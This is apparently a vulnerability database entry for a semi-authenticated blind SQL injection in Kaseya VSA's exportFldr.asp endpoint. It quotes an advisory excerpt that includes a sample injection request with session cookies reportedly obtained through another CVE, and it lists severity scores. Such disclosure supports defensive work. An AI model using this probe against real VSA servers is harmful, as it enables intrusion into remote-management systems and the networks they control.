Описание
The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. Detailed description --- Given the following request: GET /InstallTab/exportFldr.asp?fldrId=1’ HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519; Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: ``` HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-a
Ссылки
- Third Party Advisory
- Release NotesVendor Advisory
- Third Party Advisory
- Release NotesVendor Advisory
Уязвимые конфигурации
EPSS
9.8 Critical
CVSS3
8.8 High
CVSS3
6.5 Medium
CVSS2
Дефекты
Связанные уязвимости
SQL injection exists in Kaseya VSA before 9.5.6.
Уязвимость компонента /InstallTab/exportFldr.asp программного обеспечения удаленного мониторинга и управления IT-системами Kaseya VSA (Virtual System Administrator), позволяющая нарушителю выполнить произвольный SQL-код
EPSS
9.8 Critical
CVSS3
8.8 High
CVSS3
6.5 Medium
CVSS2